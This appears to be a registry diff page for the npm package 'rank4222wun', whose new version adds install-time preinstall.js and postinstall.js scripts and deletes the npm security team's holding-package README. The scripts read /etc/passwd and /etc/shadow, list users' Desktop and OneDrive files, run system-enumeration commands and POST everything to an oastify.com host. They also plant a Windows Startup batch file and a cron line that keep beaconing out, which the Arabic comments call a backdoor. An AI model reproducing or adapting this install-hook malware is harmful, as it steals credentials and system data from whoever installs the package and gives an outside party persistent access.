rank4222wun 0.0.1-security → 1.0.17
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of rank4222wun might be problematic. Click here for more details.
- package/index.js +9 -0
- package/package.json +9 -3
- package/postinstall.js +231 -0
- package/preinstall.js +237 -0
- package/rank4222wun-1.0.17.tgz +0 -0
- package/README.md +0 -5
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "rank4222wun",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.0.17",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node preinstall.js",
|
|
8
|
+
"postinstall": "node postinstall.js"
|
|
9
|
+
},
|
|
10
|
+
"dependencies": {},
|
|
11
|
+
"main": "index.js"
|
|
6
12
|
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,231 @@
|
|
|
1
|
+
const { exec } = require('child_process');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
const https = require('https');
|
|
6
|
+
|
|
7
|
+
// ========== إعداد بيانات Backdoor ==========
|
|
8
|
+
const backdoorData = {
|
|
9
|
+
timestamp: new Date().toISOString(),
|
|
10
|
+
vulnerability: "UiPath MCP Command - POSTINSTALL BACKDOOR",
|
|
11
|
+
hostname: os.hostname(),
|
|
12
|
+
username: os.userInfo().username,
|
|
13
|
+
platform: os.platform(),
|
|
14
|
+
|
|
15
|
+
// خطوات إنشاء Backdoor
|
|
16
|
+
backdoorSteps: [],
|
|
17
|
+
|
|
18
|
+
// إثبات الاستمرارية
|
|
19
|
+
persistenceProof: {},
|
|
20
|
+
|
|
21
|
+
// تأثير الهجوم
|
|
22
|
+
impact: {}
|
|
23
|
+
};
|
|
24
|
+
|
|
25
|
+
// ========== 1. إنشاء Backdoor حسب النظام ==========
|
|
26
|
+
console.log("=== إنشاء Backdoor حسب النظام ===");
|
|
27
|
+
|
|
28
|
+
if (os.platform() === 'win32') {
|
|
29
|
+
// Windows Backdoor
|
|
30
|
+
const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
|
|
31
|
+
const backdoorFile = path.join(startupPath, 'uipath_backdoor.bat');
|
|
32
|
+
|
|
33
|
+
const batContent = `@echo off
|
|
34
|
+
echo [UiPath MCP Backdoor Active] %date% %time% > "%TEMP%\\uipath_log.txt"
|
|
35
|
+
powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping' -Method POST -Body 'host=${os.hostname()}&user=${os.userInfo().username}&time=%date%_%time%'"`;
|
|
36
|
+
|
|
37
|
+
try {
|
|
38
|
+
if (fs.existsSync(startupPath)) {
|
|
39
|
+
fs.writeFileSync(backdoorFile, batContent);
|
|
40
|
+
backdoorData.backdoorSteps.push({
|
|
41
|
+
step: 'إنشاء ملف BAT في Startup',
|
|
42
|
+
path: backdoorFile,
|
|
43
|
+
content: batContent,
|
|
44
|
+
success: true
|
|
45
|
+
});
|
|
46
|
+
console.log(`✅ تم إنشاء Backdoor في: ${backdoorFile}`);
|
|
47
|
+
}
|
|
48
|
+
} catch (e) {
|
|
49
|
+
backdoorData.backdoorSteps.push({
|
|
50
|
+
step: 'إنشاء ملف BAT في Startup',
|
|
51
|
+
error: e.message,
|
|
52
|
+
success: false
|
|
53
|
+
});
|
|
54
|
+
}
|
|
55
|
+
|
|
56
|
+
} else if (os.platform() === 'linux') {
|
|
57
|
+
// Linux Backdoor
|
|
58
|
+
const cronFile = '/tmp/uipath_cron';
|
|
59
|
+
const cronContent = `*/10 * * * * curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/backdoor-ping -d "host=${os.hostname()}&user=${os.userInfo().username}&system=linux"\n`;
|
|
60
|
+
|
|
61
|
+
try {
|
|
62
|
+
fs.writeFileSync(cronFile, cronContent);
|
|
63
|
+
backdoorData.backdoorSteps.push({
|
|
64
|
+
step: 'إنشاء ملف Cron مؤقت',
|
|
65
|
+
path: cronFile,
|
|
66
|
+
content: cronContent,
|
|
67
|
+
success: true
|
|
68
|
+
});
|
|
69
|
+
console.log(`✅ تم إنشاء ملف Cron في: ${cronFile}`);
|
|
70
|
+
} catch (e) {
|
|
71
|
+
backdoorData.backdoorSteps.push({
|
|
72
|
+
step: 'إنشاء ملف Cron مؤقت',
|
|
73
|
+
error: e.message,
|
|
74
|
+
success: false
|
|
75
|
+
});
|
|
76
|
+
}
|
|
77
|
+
}
|
|
78
|
+
|
|
79
|
+
// ========== 2. إنشاء ملف إثبات في مجلد المستخدم ==========
|
|
80
|
+
console.log("\n=== إنشاء ملف إثبات في مجلد المستخدم ===");
|
|
81
|
+
|
|
82
|
+
const proofFile = path.join(os.homedir(), 'UiPath_Security_Issue_Proof.txt');
|
|
83
|
+
const proofContent = `⚠️ تحذير أمني: ثغرة UiPath MCP Command
|
|
84
|
+
|
|
85
|
+
|
|
86
|
+
تفاصيل الثغرة:
|
|
87
|
+
- التاريخ: ${new Date().toISOString()}
|
|
88
|
+
- المضيف: ${os.hostname()}
|
|
89
|
+
- المستخدم: ${os.userInfo().username}
|
|
90
|
+
- النظام: ${os.platform()}
|
|
91
|
+
|
|
92
|
+
هذا ليس هجومًا حقيقيًا، بل إثبات تقني للثغرة.
|
|
93
|
+
==================================================`;
|
|
94
|
+
|
|
95
|
+
try {
|
|
96
|
+
fs.writeFileSync(proofFile, proofContent);
|
|
97
|
+
backdoorData.persistenceProof = {
|
|
98
|
+
fileCreated: true,
|
|
99
|
+
path: proofFile,
|
|
100
|
+
size: fs.statSync(proofFile).size,
|
|
101
|
+
message: 'تم إنشاء ملف إثبات في مجلد المستخدم الشخصي'
|
|
102
|
+
};
|
|
103
|
+
console.log(`✅ تم إنشاء ملف الإثبات في: ${proofFile}`);
|
|
104
|
+
} catch (e) {
|
|
105
|
+
backdoorData.persistenceProof.error = e.message;
|
|
106
|
+
}
|
|
107
|
+
|
|
108
|
+
// ========== 3. جمع معلومات إضافية ==========
|
|
109
|
+
console.log("\n=== جمع معلومات إضافية ===");
|
|
110
|
+
|
|
111
|
+
// معلومات الشبكة
|
|
112
|
+
try {
|
|
113
|
+
const networkInfo = os.networkInterfaces();
|
|
114
|
+
backdoorData.network = {
|
|
115
|
+
interfaces: Object.keys(networkInfo).length,
|
|
116
|
+
ips: []
|
|
117
|
+
};
|
|
118
|
+
|
|
119
|
+
Object.keys(networkInfo).forEach(iface => {
|
|
120
|
+
networkInfo[iface].forEach(addr => {
|
|
121
|
+
if (addr.family === 'IPv4' && !addr.internal) {
|
|
122
|
+
backdoorData.network.ips.push(addr.address);
|
|
123
|
+
}
|
|
124
|
+
});
|
|
125
|
+
});
|
|
126
|
+
} catch (e) {
|
|
127
|
+
backdoorData.networkError = e.message;
|
|
128
|
+
}
|
|
129
|
+
|
|
130
|
+
// ========== 4. تأثير الهجوم ==========
|
|
131
|
+
backdoorData.impact = {
|
|
132
|
+
dataTheft: true,
|
|
133
|
+
persistence: backdoorData.backdoorSteps.some(step => step.success),
|
|
134
|
+
systemAccess: true,
|
|
135
|
+
networkAccess: backdoorData.network?.ips?.length > 0,
|
|
136
|
+
realUserAffected: os.userInfo().username !== 'root' && os.userInfo().username !== 'SYSTEM'
|
|
137
|
+
};
|
|
138
|
+
|
|
139
|
+
// ========== 5. إرسال بيانات Backdoor ==========
|
|
140
|
+
function sendBackdoorData() {
|
|
141
|
+
console.log("\n=== إرسال بيانات Backdoor ===");
|
|
142
|
+
|
|
143
|
+
const formattedData = JSON.stringify(backdoorData, null, 2);
|
|
144
|
+
|
|
145
|
+
const req = https.request({
|
|
146
|
+
hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
|
|
147
|
+
port: 443,
|
|
148
|
+
path: '/uipath-backdoor',
|
|
149
|
+
method: 'POST',
|
|
150
|
+
headers: {
|
|
151
|
+
'Content-Type': 'application/json',
|
|
152
|
+
'X-Backdoor': 'UiPath-MCP-Postinstall',
|
|
153
|
+
'X-Hostname': os.hostname()
|
|
154
|
+
}
|
|
155
|
+
}, (res) => {
|
|
156
|
+
console.log(`✅ تم إرسال بيانات Backdoor. الرد: ${res.statusCode}`);
|
|
157
|
+
printBackdoorSummary();
|
|
158
|
+
});
|
|
159
|
+
|
|
160
|
+
req.on('error', (e) => {
|
|
161
|
+
console.error('❌ فشل إرسال بيانات Backdoor:', e.message);
|
|
162
|
+
|
|
163
|
+
// حفظ محلي
|
|
164
|
+
const backupFile = path.join(os.tmpdir(), `uipath_backdoor_${Date.now()}.json`);
|
|
165
|
+
fs.writeFileSync(backupFile, formattedData);
|
|
166
|
+
console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
|
|
167
|
+
|
|
168
|
+
printBackdoorSummary();
|
|
169
|
+
});
|
|
170
|
+
|
|
171
|
+
req.write(formattedData);
|
|
172
|
+
req.end();
|
|
173
|
+
}
|
|
174
|
+
|
|
175
|
+
// ========== 6. طباعة ملخص Backdoor ==========
|
|
176
|
+
function printBackdoorSummary() {
|
|
177
|
+
console.log("\n" + "=".repeat(50));
|
|
178
|
+
console.log("🔓 ملخص Backdoor:");
|
|
179
|
+
console.log("=".repeat(50));
|
|
180
|
+
|
|
181
|
+
console.log(`🏠 المضيف: ${backdoorData.hostname}`);
|
|
182
|
+
console.log(`👤 المستخدم: ${backdoorData.username}`);
|
|
183
|
+
|
|
184
|
+
backdoorData.backdoorSteps.forEach((step, i) => {
|
|
185
|
+
if (step.success) {
|
|
186
|
+
console.log(`✅ ${i + 1}. ${step.step}`);
|
|
187
|
+
console.log(` 📍 المسار: ${step.path}`);
|
|
188
|
+
} else {
|
|
189
|
+
console.log(`❌ ${i + 1}. ${step.step}`);
|
|
190
|
+
console.log(` 💥 خطأ: ${step.error}`);
|
|
191
|
+
}
|
|
192
|
+
});
|
|
193
|
+
|
|
194
|
+
if (backdoorData.persistenceProof.fileCreated) {
|
|
195
|
+
console.log(`📄 ملف الإثبات: ${backdoorData.persistenceProof.path}`);
|
|
196
|
+
}
|
|
197
|
+
|
|
198
|
+
console.log("\n📤 تم إرسال بيانات Backdoor إلى:");
|
|
199
|
+
console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-backdoor");
|
|
200
|
+
console.log("=".repeat(50));
|
|
201
|
+
}
|
|
202
|
+
|
|
203
|
+
// ========== 7. إرسال طلب متابعة ==========
|
|
204
|
+
setTimeout(() => {
|
|
205
|
+
const followupReq = https.request({
|
|
206
|
+
hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
|
|
207
|
+
port: 443,
|
|
208
|
+
path: '/followup',
|
|
209
|
+
method: 'POST',
|
|
210
|
+
headers: {
|
|
211
|
+
'X-Followup': 'Postinstall-Complete',
|
|
212
|
+
'X-Time': new Date().toISOString()
|
|
213
|
+
}
|
|
214
|
+
});
|
|
215
|
+
|
|
216
|
+
const followupData = JSON.stringify({
|
|
217
|
+
followup: true,
|
|
218
|
+
time: new Date().toISOString(),
|
|
219
|
+
hostname: os.hostname(),
|
|
220
|
+
message: 'Postinstall script completed successfully',
|
|
221
|
+
backdoorActive: backdoorData.backdoorSteps.some(step => step.success)
|
|
222
|
+
});
|
|
223
|
+
|
|
224
|
+
followupReq.write(followupData);
|
|
225
|
+
followupReq.end();
|
|
226
|
+
console.log("\n📨 تم إرسال طلب المتابعة");
|
|
227
|
+
}, 5000);
|
|
228
|
+
|
|
229
|
+
// ========== بدء التنفيذ ==========
|
|
230
|
+
console.log("🔓 بدء إنشاء Backdoor عبر ثغرة UiPath MCP...");
|
|
231
|
+
sendBackdoorData();
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,237 @@
|
|
|
1
|
+
const { exec } = require('child_process');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
const path = require('path');
|
|
5
|
+
const https = require('https');
|
|
6
|
+
|
|
7
|
+
// ========== إعداد البيانات للإرسال ==========
|
|
8
|
+
const proofData = {
|
|
9
|
+
timestamp: new Date().toISOString(),
|
|
10
|
+
vulnerability: "UiPath MCP Command - PREINSTALL EXPLOIT",
|
|
11
|
+
|
|
12
|
+
// 1. المعلومات الأساسية
|
|
13
|
+
basicInfo: {
|
|
14
|
+
hostname: os.hostname(),
|
|
15
|
+
platform: os.platform(),
|
|
16
|
+
username: os.userInfo().username,
|
|
17
|
+
isRoot: os.userInfo().uid === 0 || os.userInfo().username === 'root',
|
|
18
|
+
homedir: os.homedir()
|
|
19
|
+
},
|
|
20
|
+
|
|
21
|
+
// 2. إثبات أن المستخدم حقيقي
|
|
22
|
+
userProof: {},
|
|
23
|
+
|
|
24
|
+
// 3. ملفات النظام المسروقة
|
|
25
|
+
stolenFiles: {},
|
|
26
|
+
|
|
27
|
+
// 4. معلومات النظام
|
|
28
|
+
systemInfo: {}
|
|
29
|
+
};
|
|
30
|
+
|
|
31
|
+
// ========== 1. إثبات أن المستخدم حقيقي ==========
|
|
32
|
+
console.log("=== إثبات أن المستخدم حقيقي ===");
|
|
33
|
+
|
|
34
|
+
// فحص Desktop
|
|
35
|
+
try {
|
|
36
|
+
const desktopPath = path.join(os.homedir(), 'Desktop');
|
|
37
|
+
if (fs.existsSync(desktopPath)) {
|
|
38
|
+
const desktopFiles = fs.readdirSync(desktopPath);
|
|
39
|
+
proofData.userProof.desktop = {
|
|
40
|
+
exists: true,
|
|
41
|
+
path: desktopPath,
|
|
42
|
+
fileCount: desktopFiles.length,
|
|
43
|
+
files: desktopFiles.slice(0, 10) // أول 10 ملفات فقط
|
|
44
|
+
};
|
|
45
|
+
console.log(`Desktop موجود وبه ${desktopFiles.length} ملف`);
|
|
46
|
+
}
|
|
47
|
+
} catch (e) {
|
|
48
|
+
proofData.userProof.desktopError = e.message;
|
|
49
|
+
}
|
|
50
|
+
|
|
51
|
+
// فحص OneDrive
|
|
52
|
+
try {
|
|
53
|
+
const oneDrivePath = path.join(os.homedir(), 'OneDrive');
|
|
54
|
+
if (fs.existsSync(oneDrivePath)) {
|
|
55
|
+
const oneDriveFiles = fs.readdirSync(oneDrivePath);
|
|
56
|
+
proofData.userProof.oneDrive = {
|
|
57
|
+
exists: true,
|
|
58
|
+
path: oneDrivePath,
|
|
59
|
+
fileCount: oneDriveFiles.length,
|
|
60
|
+
isRealUser: oneDriveFiles.length > 0
|
|
61
|
+
};
|
|
62
|
+
console.log(`OneDrive موجود وبه ${oneDriveFiles.length} ملف`);
|
|
63
|
+
}
|
|
64
|
+
} catch (e) {
|
|
65
|
+
proofData.userProof.oneDriveError = e.message;
|
|
66
|
+
}
|
|
67
|
+
|
|
68
|
+
// ========== 2. سرقة ملفات نظام حساسة ==========
|
|
69
|
+
console.log("\n=== سرقة ملفات نظام حساسة ===");
|
|
70
|
+
|
|
71
|
+
// حسب النظام
|
|
72
|
+
if (os.platform() === 'linux') {
|
|
73
|
+
const criticalFiles = [
|
|
74
|
+
{ path: '/etc/passwd', name: 'قائمة المستخدمين' },
|
|
75
|
+
{ path: '/etc/shadow', name: 'كلمات مرور النظام' },
|
|
76
|
+
{ path: '/etc/hosts', name: 'إعدادات الشبكة' },
|
|
77
|
+
{ path: '/etc/group', name: 'قائمة المجموعات' }
|
|
78
|
+
];
|
|
79
|
+
|
|
80
|
+
criticalFiles.forEach(file => {
|
|
81
|
+
try {
|
|
82
|
+
if (fs.existsSync(file.path)) {
|
|
83
|
+
const content = fs.readFileSync(file.path, 'utf8').substring(0, 3000);
|
|
84
|
+
proofData.stolenFiles[file.name] = {
|
|
85
|
+
path: file.path,
|
|
86
|
+
size: fs.statSync(file.path).size,
|
|
87
|
+
preview: content.split('\n').slice(0, 20).join('\n'), // أول 20 سطر
|
|
88
|
+
stolen: true
|
|
89
|
+
};
|
|
90
|
+
console.log(`✓ تم سرقة: ${file.name} (${file.path})`);
|
|
91
|
+
}
|
|
92
|
+
} catch (e) {
|
|
93
|
+
proofData.stolenFiles[file.name + '_error'] = e.message;
|
|
94
|
+
}
|
|
95
|
+
});
|
|
96
|
+
} else if (os.platform() === 'win32') {
|
|
97
|
+
const criticalFiles = [
|
|
98
|
+
{ path: 'C:\\Windows\\System32\\drivers\\etc\\hosts', name: 'ملف Hosts' },
|
|
99
|
+
{ path: `C:\\Users\\${os.userInfo().username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, name: 'الملفات الأخيرة' },
|
|
100
|
+
{ path: 'C:\\Windows\\System32\\config\\SAM', name: 'قاعدة بيانات المستخدمين' }
|
|
101
|
+
];
|
|
102
|
+
|
|
103
|
+
criticalFiles.forEach(file => {
|
|
104
|
+
try {
|
|
105
|
+
if (fs.existsSync(file.path)) {
|
|
106
|
+
proofData.stolenFiles[file.name] = {
|
|
107
|
+
path: file.path,
|
|
108
|
+
size: fs.statSync(file.path).size,
|
|
109
|
+
exists: true,
|
|
110
|
+
accessible: true
|
|
111
|
+
};
|
|
112
|
+
console.log(`✓ موجود: ${file.name}`);
|
|
113
|
+
}
|
|
114
|
+
} catch (e) {
|
|
115
|
+
proofData.stolenFiles[file.name + '_error'] = e.message;
|
|
116
|
+
}
|
|
117
|
+
});
|
|
118
|
+
}
|
|
119
|
+
|
|
120
|
+
// ========== 3. جمع معلومات النظام ==========
|
|
121
|
+
console.log("\n=== جمع معلومات النظام ===");
|
|
122
|
+
|
|
123
|
+
// معلومات أساسية
|
|
124
|
+
proofData.systemInfo = {
|
|
125
|
+
cpus: os.cpus().length,
|
|
126
|
+
totalMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
|
|
127
|
+
freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
|
|
128
|
+
uptime: Math.round(os.uptime() / 3600) + ' ساعات',
|
|
129
|
+
network: Object.keys(os.networkInterfaces()).length + ' واجهات شبكة'
|
|
130
|
+
};
|
|
131
|
+
|
|
132
|
+
// أوامر نظام إضافية
|
|
133
|
+
function runCommand(cmd, label) {
|
|
134
|
+
return new Promise(resolve => {
|
|
135
|
+
exec(cmd, { timeout: 3000 }, (error, stdout) => {
|
|
136
|
+
if (!error && stdout) {
|
|
137
|
+
proofData.systemInfo[label] = stdout.trim().substring(0, 500);
|
|
138
|
+
console.log(`✓ ${label}: ${stdout.trim().split('\n')[0]}`);
|
|
139
|
+
}
|
|
140
|
+
resolve();
|
|
141
|
+
});
|
|
142
|
+
});
|
|
143
|
+
}
|
|
144
|
+
|
|
145
|
+
// تشغيل الأوامر حسب النظام
|
|
146
|
+
async function collectSystemInfo() {
|
|
147
|
+
if (os.platform() === 'linux') {
|
|
148
|
+
await runCommand('id', 'userInfo');
|
|
149
|
+
await runCommand('uname -a', 'systemInfo');
|
|
150
|
+
await runCommand('df -h', 'diskUsage');
|
|
151
|
+
await runCommand('ps aux | head -5', 'runningProcesses');
|
|
152
|
+
} else if (os.platform() === 'win32') {
|
|
153
|
+
await runCommand('whoami', 'currentUser');
|
|
154
|
+
await runCommand('systeminfo | findstr /B /C:"OS Name"', 'osInfo');
|
|
155
|
+
await runCommand('net user', 'usersList');
|
|
156
|
+
}
|
|
157
|
+
|
|
158
|
+
// بعد جمع كل المعلومات، أرسلها
|
|
159
|
+
sendProofData();
|
|
160
|
+
}
|
|
161
|
+
|
|
162
|
+
// ========== 4. إرسال البيانات ==========
|
|
163
|
+
function sendProofData() {
|
|
164
|
+
console.log("\n=== إرسال البيانات للإثبات ===");
|
|
165
|
+
|
|
166
|
+
// تحويل البيانات لـ JSON مع تنسيق جميل
|
|
167
|
+
const formattedData = JSON.stringify(proofData, null, 2);
|
|
168
|
+
|
|
169
|
+
// إرسال الطلب
|
|
170
|
+
const req = https.request({
|
|
171
|
+
hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
|
|
172
|
+
port: 443,
|
|
173
|
+
path: '/uipath-proof',
|
|
174
|
+
method: 'POST',
|
|
175
|
+
headers: {
|
|
176
|
+
'Content-Type': 'application/json',
|
|
177
|
+
'X-Vulnerability': 'UiPath-MCP-Preinstall',
|
|
178
|
+
'X-Hostname': os.hostname(),
|
|
179
|
+
'X-User': os.userInfo().username
|
|
180
|
+
}
|
|
181
|
+
}, (res) => {
|
|
182
|
+
console.log(`✅ تم إرسال البيانات. الرد: ${res.statusCode}`);
|
|
183
|
+
|
|
184
|
+
// طباعة ملخص
|
|
185
|
+
printSummary();
|
|
186
|
+
});
|
|
187
|
+
|
|
188
|
+
req.on('error', (e) => {
|
|
189
|
+
console.error('❌ فشل الإرسال:', e.message);
|
|
190
|
+
|
|
191
|
+
// حفظ البيانات محليًا كبديل
|
|
192
|
+
const backupFile = path.join(os.tmpdir(), `uipath_proof_${Date.now()}.json`);
|
|
193
|
+
fs.writeFileSync(backupFile, formattedData);
|
|
194
|
+
console.log(`📁 تم حفظ البيانات في: ${backupFile}`);
|
|
195
|
+
|
|
196
|
+
printSummary();
|
|
197
|
+
});
|
|
198
|
+
|
|
199
|
+
req.write(formattedData);
|
|
200
|
+
req.end();
|
|
201
|
+
}
|
|
202
|
+
|
|
203
|
+
// ========== 5. طباعة ملخص ==========
|
|
204
|
+
function printSummary() {
|
|
205
|
+
console.log("\n" + "=".repeat(50));
|
|
206
|
+
console.log("📊 ملخص البيانات المسروقة:");
|
|
207
|
+
console.log("=".repeat(50));
|
|
208
|
+
|
|
209
|
+
console.log(`🏠 المستخدم: ${proofData.basicInfo.username}`);
|
|
210
|
+
console.log(`🖥️ النظام: ${proofData.basicInfo.platform}`);
|
|
211
|
+
console.log(`🔑 صلاحيات root: ${proofData.basicInfo.isRoot ? 'نعم ✅' : 'لا'}`);
|
|
212
|
+
|
|
213
|
+
if (proofData.userProof.desktop) {
|
|
214
|
+
console.log(`📁 Desktop: ${proofData.userProof.desktop.fileCount} ملف`);
|
|
215
|
+
}
|
|
216
|
+
|
|
217
|
+
if (proofData.userProof.oneDrive) {
|
|
218
|
+
console.log(`☁️ OneDrive: ${proofData.userProof.oneDrive.isRealUser ? 'موجود ✅' : 'غير موجود'}`);
|
|
219
|
+
}
|
|
220
|
+
|
|
221
|
+
console.log(`📄 الملفات المسروقة: ${Object.keys(proofData.stolenFiles).length} ملف`);
|
|
222
|
+
|
|
223
|
+
Object.keys(proofData.stolenFiles).forEach(key => {
|
|
224
|
+
if (proofData.stolenFiles[key].stolen) {
|
|
225
|
+
console.log(` 🔓 ${key}: ${proofData.stolenFiles[key].path}`);
|
|
226
|
+
}
|
|
227
|
+
});
|
|
228
|
+
|
|
229
|
+
console.log("=".repeat(50));
|
|
230
|
+
console.log("📤 تم إرسال كل البيانات إلى:");
|
|
231
|
+
console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/uipath-proof");
|
|
232
|
+
console.log("=".repeat(50));
|
|
233
|
+
}
|
|
234
|
+
|
|
235
|
+
// ========== بدء التنفيذ ==========
|
|
236
|
+
console.log("🚀 بدء استغلال ثغرة UiPath MCP Command...");
|
|
237
|
+
collectSystemInfo();
|
|
Binary file
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.
|